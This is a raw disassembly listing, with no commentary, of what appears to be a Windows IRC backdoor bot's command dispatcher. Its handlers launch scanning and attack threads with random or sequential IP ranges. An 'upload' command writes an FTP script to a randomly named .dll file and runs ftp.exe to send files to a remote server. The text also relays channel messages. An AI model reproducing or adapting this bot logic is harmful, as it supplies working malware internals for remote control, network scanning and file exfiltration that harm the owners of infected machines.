call sub_409D34
add esp, 14h
jmp loc_407563
; ---------------------------------------------------------------------------
loc_407386: ; CODE XREF: sub_401CC7+5691�j
push [ebp+arg_1C]
lea eax, [ebp+Dst]
push offset asc_443430 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 20h
loc_4073B6: ; CODE XREF: sub_401CC7+5676�j
cmp [ebp+arg_1C], ebx
jnz loc_407563
loc_4073BF: ; CODE XREF: sub_401CC7+569E�j
push ebx
push [ebp+var_4]
push offset unk_443464
jmp short loc_407370
; ---------------------------------------------------------------------------
loc_4073CA: ; CODE XREF: sub_401CC7+5047�j
; sub_401CC7+505E�j ...
mov eax, [ebp+var_8]
push 7Fh ; Count
push [ebp+Source] ; Source
mov [ebp+var_C64], eax
mov eax, [ebp+var_4]
mov [ebp+var_C68], eax
lea eax, [ebp+var_CFC]
push eax ; Dest
call _strncpy
push edi ; Str
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_C7C], eax
call _atoi
push [ebp+arg_18] ; Str
mov [ebp+var_C78], eax
call _atoi
mov esi, [ebp+esi+var_7C]
add esp, 18h
cmp esi, ebx
mov [ebp+var_C74], eax
jz short loc_40742F
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_C70], eax
jmp short loc_407435
; ---------------------------------------------------------------------------
loc_40742F: ; CODE XREF: sub_401CC7+5757�j
mov [ebp+var_C70], ebx
loc_407435: ; CODE XREF: sub_401CC7+5766�j
push 7Fh ; Count
lea eax, [ebp+var_D7C]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
mov esi, [ebp+arg_4]
lea eax, [ebp+var_CFC]
mov [ebp+var_D80], esi
push [ebp+var_C74]
push [ebp+var_C78]
push eax
lea eax, [ebp+Dst]
push [ebp+var_C7C]
push offset asc_443330 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 17h ; int
push eax ; Source
call sub_40B756
add esp, 24h
mov [ebp+var_C6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_D80]
push ebx
push eax
push offset sub_413E91
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_C6C]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4074D8
loc_4074C6: ; CODE XREF: sub_401CC7+580F�j
cmp [ebp+var_C60], ebx
jnz short loc_4074F3
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4074C6
; ---------------------------------------------------------------------------
loc_4074D8: ; CODE XREF: sub_401CC7+57FD�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset asc_443378 ; "-"
loc_4074E4: ; CODE XREF: sub_401CC7+4EB2�j
; sub_401CC7+633F�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_4074F3: ; CODE XREF: sub_401CC7+4E96�j
; sub_401CC7+5805�j ...
cmp [ebp+var_8], ebx
jnz loc_408637
push ebx
push [ebp+var_4]
loc_407500: ; CODE XREF: sub_401CC7+22CF�j
lea eax, [ebp+Dst]
push eax
push [ebp+Format]
push esi
jmp loc_408523
; ---------------------------------------------------------------------------
loc_407513: ; CODE XREF: sub_401CC7+5019�j
; sub_401CC7+5030�j
push 0Bh
call sub_40B99E
push edi ; Str
mov [ebp+arg_1C], eax
call _atoi
add eax, [ebp+arg_1C]
pop ecx
pop ecx
cmp eax, 1F4h
jle loc_4076CF
push [ebp+arg_1C]
lea eax, [ebp+Dst]
push offset asc_4431C0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 20h
loc_407563: ; CODE XREF: sub_401CC7+52EE�j
; sub_401CC7+56BA�j ...
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz loc_402085
push [ebp+arg_8] ; Str2
push offset aUpload ; "upload"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409B16
push 4
push esi
call sub_417471
pop ecx
test eax, eax
pop ecx
jnz short loc_40759F
push esi
push offset unk_4436E0
jmp loc_408F7E
; ---------------------------------------------------------------------------
loc_40759F: ; CODE XREF: sub_401CC7+58CB�j
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
push 9
cdq
pop ecx
idiv ecx
push edx
call _rand
push 63h
cdq
pop ecx
idiv ecx
push edx
call _rand
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_51F8]
push edx
push eax
lea eax, [ebp+Filename]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax ; Dest
call _sprintf
lea eax, [ebp+Filename]
push offset Mode ; "ab"
push eax ; Filename
call _fopen
add esp, 20h
cmp eax, ebx
mov [ebp+File], eax
jz loc_402085
push esi
push [ebp+arg_18]
push [ebp+Src]
push edi
push [ebp+Source]
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax ; File
call _fprintf
push [ebp+File] ; File
call _fclose
add esp, 20h
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+var_4CF0]
push offset aSS_2 ; "-s:%s"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_4CF0]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen_0 ; "open"
push ebx
call dword_4E3064
push [ebp+Source]
test eax, eax
push esi ; Format
jz short loc_40766E
push offset unk_443750
jmp short loc_407673
; ---------------------------------------------------------------------------
loc_40766E: ; CODE XREF: sub_401CC7+599E�j
push offset asc_443778 ; "-"
loc_407673: ; CODE XREF: sub_401CC7+59A5�j
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40769C
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_40769C: ; CODE XREF: sub_401CC7+59B7�j
lea eax, [ebp+Dst]
push eax
call sub_415C3F
loc_4076A8: ; CODE XREF: sub_401CC7+5A06�j
lea eax, [ebp+Filename]
push 4
push eax
call sub_417471
add esp, 0Ch
test eax, eax
jz loc_402085
lea eax, [ebp+Filename]
push eax
call sub_41F6D0
jmp short loc_4076A8
; ---------------------------------------------------------------------------
loc_4076CF: ; CODE XREF: sub_401CC7+5866�j
push [ebp+Source] ; Str
call _atoi
push edi ; Str
mov [ebp+var_370], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_358], eax
call _atoi
add esp, 0Ch
cmp eax, 5
mov [ebp+var_36C], eax
jnb short loc_407708
push 5
pop eax
mov [ebp+var_36C], eax
loc_407708: ; CODE XREF: sub_401CC7+5A36�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_407715
mov [ebp+var_36C], ecx
loc_407715: ; CODE XREF: sub_401CC7+5A46�j
push [ebp+arg_18] ; Str
call _atoi
mov [ebp+var_368], eax
mov eax, 320h
cmp [ebp+var_368], eax
pop ecx
jbe short loc_407737
mov [ebp+var_368], eax
loc_407737: ; CODE XREF: sub_401CC7+5A68�j
or [ebp+var_354], 0FFFFFFFFh
cmp dword_448220, ebx
mov [ebp+arg_20], ebx
jz short loc_407786
mov edi, offset dword_448220
loc_40774E: ; CODE XREF: sub_401CC7+5AA1�j
push [ebp+Source] ; Str2
lea eax, [edi-28h]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40776C
inc [ebp+arg_20]
add edi, 40h
cmp [edi], ebx
jnz short loc_40774E
jmp short loc_407786
; ---------------------------------------------------------------------------
loc_40776C: ; CODE XREF: sub_401CC7+5A97�j
mov eax, [ebp+arg_20]
mov ecx, eax
mov [ebp+var_354], eax
shl ecx, 6
mov ecx, dword_448220[ecx]
mov [ebp+var_370], ecx
loc_407786: ; CODE XREF: sub_401CC7+5A80�j
; sub_401CC7+5AA3�j
cmp [ebp+var_370], ebx
jnz short loc_407798
push offset unk_443200
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_407798: ; CODE XREF: sub_401CC7+5AC5�j
mov edi, [ebp+esi+var_7C]
cmp edi, ebx
mov [ebp+Src], edi
jz short loc_4077D3
cmp byte ptr [edi], 23h
jz short loc_4077D3
push edi ; Format
lea eax, [ebp+var_484]
push 10h ; Count
push eax ; Dest
call __snprintf
push 78h ; Val
push edi ; Str
call _strchr
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_344], eax
jmp loc_4078AD
; ---------------------------------------------------------------------------
loc_4077D3: ; CODE XREF: sub_401CC7+5ADA�j
; sub_401CC7+5ADF�j
cmp [ebp+var_8FF], bl
jnz short loc_4077F5
cmp [ebp+var_8FE], bl
jnz short loc_4077F5
cmp [ebp+var_8EE], bl
jnz short loc_4077F5
push offset unk_443234
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_4077F5: ; CODE XREF: sub_401CC7+5B12�j
; sub_401CC7+5B1A�j ...
push 10h
lea eax, [ebp+var_2D8]
pop edi
push eax
lea eax, [ebp+var_2F8]
push eax
mov [ebp+var_2D8], edi
push [ebp+arg_4]
call dword_4E309C ; getsockname
mov al, [ebp+var_8FF]
push edi ; Args
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2F4], eax
push [ebp+var_2F4] ; Count
call dword_4E3184 ; inet_ntoa
push eax ; Source
lea eax, [ebp+var_484]
push eax ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_8EE], bl
jz short loc_4078A7
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h ; Ch
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_484]
push eax ; Str
call _strrchr
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+File+3], bl
jle short loc_40789B
loc_407879: ; CODE XREF: sub_401CC7+5BD2�j
cmp eax, ebx
jz short loc_40789B
mov byte ptr [eax], 78h
lea eax, [ebp+var_484]
push 30h ; Ch
push eax ; Str
call _strrchr
inc byte ptr [ebp+File+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+File+3]
cmp ecx, edi
jl short loc_407879
loc_40789B: ; CODE XREF: sub_401CC7+5BB0�j
; sub_401CC7+5BB4�j
mov [ebp+var_344], 1
jmp short loc_4078AD
; ---------------------------------------------------------------------------
loc_4078A7: ; CODE XREF: sub_401CC7+5B8A�j
mov [ebp+var_344], ebx
loc_4078AD: ; CODE XREF: sub_401CC7+5B07�j
; sub_401CC7+5BDE�j
mov eax, [ebp+arg_4]
push [ebp+Format] ; Format
mov [ebp+var_374], eax
mov eax, [ebp+var_4]
mov [ebp+var_34C], eax
mov eax, [ebp+var_8]
mov [ebp+var_348], eax
mov edi, 80h
lea eax, [ebp+var_474]
push edi ; Count
push eax ; Dest
call __snprintf
mov esi, [ebp+esi+var_78]
add esp, 0Ch
cmp esi, ebx
jz short loc_4078FE
loc_4078EB: ; CODE XREF: sub_401CC7+5C5A�j
push esi ; Format
loc_4078EC: ; CODE XREF: sub_401CC7+5C44�j
lea eax, [ebp+var_3F4]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_407929
; ---------------------------------------------------------------------------
loc_4078FE: ; CODE XREF: sub_401CC7+5C22�j
mov eax, [ebp+Src]
cmp eax, ebx
jz short loc_40790D
cmp byte ptr [eax], 23h
jnz short loc_40790D
push eax
jmp short loc_4078EC
; ---------------------------------------------------------------------------
loc_40790D: ; CODE XREF: sub_401CC7+5C3C�j
; sub_401CC7+5C41�j
mov esi, offset a2 ; "#2"
push offset byte_4E2FB0 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4078EB
mov [ebp+var_3F4], bl
loc_407929: ; CODE XREF: sub_401CC7+5C35�j
cmp [ebp+var_344], ebx
mov eax, offset aRandom_1 ; "Random"
jnz short loc_40793B
mov eax, offset aSequential_0 ; "Sequential"
loc_40793B: ; CODE XREF: sub_401CC7+5C6D�j
push [ebp+var_358]
lea ecx, [ebp+var_484]
push [ebp+var_368]
push [ebp+var_36C]
push [ebp+var_370]
push ecx
push eax
lea eax, [ebp+Dst]
push offset asc_44327C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B756
add esp, 2Ch
mov [ebp+var_364], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_484]
push ebx
push eax
push offset sub_40CB69
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_364]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4079C9
loc_4079B3: ; CODE XREF: sub_401CC7+5D00�j
cmp [ebp+var_340], ebx
jnz loc_408506
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4079B3
; ---------------------------------------------------------------------------
loc_4079C9: ; CODE XREF: sub_401CC7+5CEA�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4432E4
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_4079DA: ; CODE XREF: sub_401CC7+4FEB�j
; sub_401CC7+5002�j
push [ebp+Source]
call sub_40AE55
push edi ; Str
mov [ebp+var_4E0], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_4F0], eax
call _atoi
push [ebp+arg_18] ; Str
mov [ebp+var_4EC], eax
call _atoi
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_4E8], eax
lea eax, [ebp+var_570]
mov [ebp+var_574], esi
push eax ; Dest
call _strncpy
add esp, 1Ch
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_4D8], edi
push [ebp+var_4EC]
mov [ebp+var_4D4], eax
push [ebp+var_4F0]
push [ebp+var_4E8]
push [ebp+var_4E0]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Dst]
push offset asc_443128 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B756
add esp, 24h
mov [ebp+var_4E4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_574]
push ebx
push eax
push offset sub_40CF86
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_4E4]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_407ACF
loc_407AB9: ; CODE XREF: sub_401CC7+5E06�j
cmp [ebp+var_4D0], ebx
jnz loc_403F8B
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_407AB9
; ---------------------------------------------------------------------------
loc_407ACF: ; CODE XREF: sub_401CC7+5DF0�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_443178
jmp loc_403F7C
; ---------------------------------------------------------------------------
loc_407AE0: ; CODE XREF: sub_401CC7+4FAE�j
; sub_401CC7+4FC5�j
push [ebp+Source] ; Str
call _atoi
imul eax, 234h
pop ecx
cmp byte_456030[eax], bl
jz loc_409B16
cmp [ebp+var_C], ebx
jz loc_409B16
push edi ; Str
call _strlen
push [ebp+Source] ; Str
mov esi, eax
call _strlen
push [ebp+arg_8] ; Str
add esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Src] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
add esp, 14h
mov esi, eax
lea eax, [ebp+Dst]
push esi
push offset dword_4430FC ; Format
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp esi, ebx
jz loc_409B16
push [ebp+Source] ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409B16
push [ebp+Source] ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B16
push ebx ; int
lea eax, [ebp+Dst]
push ebx ; int
push eax ; int
push edi ; Str
push [ebp+Source] ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_456024[eax] ; int
call sub_409D34
push [ebp+Source] ; Str
call _atoi
imul eax, 234h
add esp, 18h
cmp byte ptr dword_455E18[eax], 73h
jnz loc_409B16
push esi
push [ebp+Source] ; Str
call _atoi
imul eax, 234h
pop ecx
add eax, offset byte_456030
push eax
push edi
push offset aSSS ; "[%s] * %s %s"
jmp loc_407CB0
; ---------------------------------------------------------------------------
loc_407BD8: ; CODE XREF: sub_401CC7+4F80�j
; sub_401CC7+4F97�j
push [ebp+Source] ; Str
call _atoi
imul eax, 234h
pop ecx
cmp byte_456030[eax], bl
jz loc_409B16
cmp [ebp+var_C], ebx
jz loc_409B16
push edi ; Str
call _strlen
push [ebp+Source] ; Str
mov esi, eax
call _strlen
push [ebp+arg_8] ; Str
add esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Src] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_409B16
push [ebp+Source] ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409B16
push [ebp+Source] ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B16
push ebx ; int
push ebx ; int
push esi ; int
push edi ; Str
push [ebp+Source] ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_456024[eax] ; int
call sub_409D34
push [ebp+Source] ; Str
call _atoi
imul eax, 234h
add esp, 18h
cmp byte ptr dword_455E18[eax], 73h
jnz loc_409B16
push esi
push [ebp+Source] ; Str
call _atoi
imul eax, 234h
pop ecx
add eax, offset byte_456030
push eax
push edi
push offset aSSS_0 ; "[%s] <%s> %s"
loc_407CB0: ; CODE XREF: sub_401CC7+5F0C�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 28h
jmp loc_409B16
; ---------------------------------------------------------------------------
loc_407CDD: ; CODE XREF: sub_401CC7+4F52�j
; sub_401CC7+4F69�j
push [ebp+Source]
call dword_4E3138 ; inet_addr
push edi ; Str
mov [ebp+var_680], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_690], eax
call _atoi
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_688], eax
lea eax, [ebp+var_710]
mov [ebp+var_714], esi
push eax ; Dest
call _strncpy
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_678], edi
push [ebp+var_688]
mov [ebp+var_674], eax
push [ebp+var_690]
push [ebp+var_680]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Dst]
push offset asc_443054 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov [ebp+var_684], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_714]
push ebx
push eax
push offset sub_40CE95
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_684]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_407DBF
loc_407DA9: ; CODE XREF: sub_401CC7+60F6�j
cmp [ebp+var_670], ebx
jnz loc_403F8B
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_407DA9
; ---------------------------------------------------------------------------
loc_407DBF: ; CODE XREF: sub_401CC7+60E0�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_443090
jmp loc_403F7C
; ---------------------------------------------------------------------------
loc_407DD0: ; CODE XREF: sub_401CC7+4F24�j
; sub_401CC7+4F3B�j
push [ebp+Source] ; Str
call _atoi
mov [ebp+var_112C], eax
push 7Fh ; Count
lea eax, [ebp+var_1230]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+Src] ; Str
call _atoi
mov esi, [ebp+arg_4]
add esp, 14h
mov [ebp+var_1130], eax
lea eax, [ebp+var_11B0]
push [ebp+Format] ; Format
mov [ebp+var_1238], esi
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
add esp, 0Ch
mov edi, [ebp+var_4]
mov [ebp+var_111C], eax
push [ebp+var_1130]
lea eax, [ebp+var_1230]
mov [ebp+var_1120], edi
push eax
push [ebp+var_112C]
push esi
call sub_40AF71
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_442FC8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 18h ; int
push eax ; Source
call sub_40B756
add esp, 24h
mov [ebp+var_1128], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1238]
push ebx
push eax
push offset sub_410E2B
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1128]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_407EBC
loc_407EA6: ; CODE XREF: sub_401CC7+61F3�j
cmp [ebp+var_1118], ebx
jnz loc_403F8B
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_407EA6
; ---------------------------------------------------------------------------
loc_407EBC: ; CODE XREF: sub_401CC7+61DD�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_443004
jmp loc_403F7C
; ---------------------------------------------------------------------------
loc_407ECD: ; CODE XREF: sub_401CC7+4EF6�j
; sub_401CC7+4F0D�j
push 0FFh ; Count
lea eax, [ebp+var_2878]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
push 0FFh ; Count
lea eax, [ebp+var_2778]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+Src] ; Str
mov [ebp+var_2674], ebx
call _atoi
mov [ebp+var_2670], eax
mov eax, [ebp+esi+var_80]
add esp, 1Ch
cmp eax, ebx
jz short loc_407F26
push 10h ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtoul
add esp, 0Ch
mov [ebp+var_2668], eax
jmp short loc_407F2C
; ---------------------------------------------------------------------------
loc_407F26: ; CODE XREF: sub_401CC7+6249�j
mov [ebp+var_2668], ebx
loc_407F2C: ; CODE XREF: sub_401CC7+625D�j
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_407F43
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_266C], eax
jmp short loc_407F49
; ---------------------------------------------------------------------------
loc_407F43: ; CODE XREF: sub_401CC7+626B�j
mov [ebp+var_266C], ebx
loc_407F49: ; CODE XREF: sub_401CC7+627A�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_2664], eax
lea eax, [ebp+var_28F8]
mov [ebp+var_28FC], esi
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_265C], eax
mov eax, [ebp+var_8]
push edi
mov [ebp+var_2660], eax
push [ebp+Source]
lea eax, [ebp+Dst]
push offset asc_442F4C ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push 1Dh ; int
push eax ; Source
call sub_40B756
add esp, 1Ch
mov [ebp+var_2678], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_28FC]
push ebx
push eax
push offset sub_416F62
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_2678]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_407FFA
loc_407FE4: ; CODE XREF: sub_401CC7+6331�j
cmp [ebp+var_2658], ebx
jnz loc_4074F3
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_407FE4
; ---------------------------------------------------------------------------
loc_407FFA: ; CODE XREF: sub_401CC7+631B�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442F78
jmp loc_4074E4
; ---------------------------------------------------------------------------
loc_40800B: ; CODE XREF: sub_401CC7+4EC8�j
; sub_401CC7+4EDF�j
push 7Fh
lea eax, [ebp+var_3490]
pop esi
push esi ; Count
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3410]
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3390]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3310]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_328C], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_3288], eax
lea eax, [ebp+Dst]
push edi
mov [ebp+var_3494], esi
push [ebp+Source]
push offset asc_442EC8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 12h ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov [ebp+var_3290], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3494]
push ebx
push eax
push offset sub_415512
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_3290]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4080E2
loc_4080CC: ; CODE XREF: sub_401CC7+6419�j
cmp [ebp+var_3284], ebx
jnz loc_4074F3
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4080CC
; ---------------------------------------------------------------------------
loc_4080E2: ; CODE XREF: sub_401CC7+6403�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442F04
jmp loc_4074E4
; ---------------------------------------------------------------------------
loc_4080F3: ; CODE XREF: sub_401CC7+4D9B�j
; sub_401CC7+4DB2�j
push 7Fh
lea eax, [ebp+var_3068]
pop esi
push esi ; Count
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_2FE8]
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_2F68]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_2EE8]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_2E64], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_2E60], eax
lea eax, [ebp+Dst]
push edi
mov [ebp+var_306C], esi
push [ebp+Source]
push offset asc_442DD8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Eh ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov [ebp+var_2E68], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_306C]
push ebx
push eax
push offset sub_41424D
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_2E68]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4081CA
loc_4081B4: ; CODE XREF: sub_401CC7+6501�j
cmp [ebp+var_2E5C], ebx
jnz loc_4074F3
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4081B4
; ---------------------------------------------------------------------------
loc_4081CA: ; CODE XREF: sub_401CC7+64EB�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442E08
jmp loc_4074E4
; ---------------------------------------------------------------------------
loc_4081DB: ; CODE XREF: sub_401CC7+4C72�j
; sub_401CC7+4C89�j ...
push 7Fh
lea eax, [ebp+var_3CE4]
pop esi
push esi ; Count
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3C64]
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3BE4]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3B64]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
push 20h ; Count
lea eax, [ebp+var_3AE4]
push [ebp+arg_8] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 3Ch
mov esi, [ebp+arg_4]
mov [ebp+var_3A64], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_3A60], eax
lea eax, [ebp+Dst]
push edi
mov [ebp+var_3CEC], esi
push [ebp+Source]
push offset asc_442D14 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Dh ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov [ebp+var_3CE8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3CEC]
push ebx
push eax
push offset sub_4134D4
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_3CE8]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4082C3
loc_4082AD: ; CODE XREF: sub_401CC7+65FA�j
cmp [ebp+var_3A5C], ebx
jnz loc_4074F3
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4082AD
; ---------------------------------------------------------------------------
loc_4082C3: ; CODE XREF: sub_401CC7+65E4�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442D44
jmp loc_4074E4
; ---------------------------------------------------------------------------
loc_4082D4: ; CODE XREF: sub_401CC7+4C44�j
; sub_401CC7+4C5B�j
push 7Fh ; Count
lea eax, [ebp+var_1778]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
push edi ; Str
call _atoi
push 3Fh ; Count
mov [ebp+var_1628], eax
push [ebp+Src] ; Source
lea eax, [ebp+var_16F8]
push eax ; Dest
call _strncpy
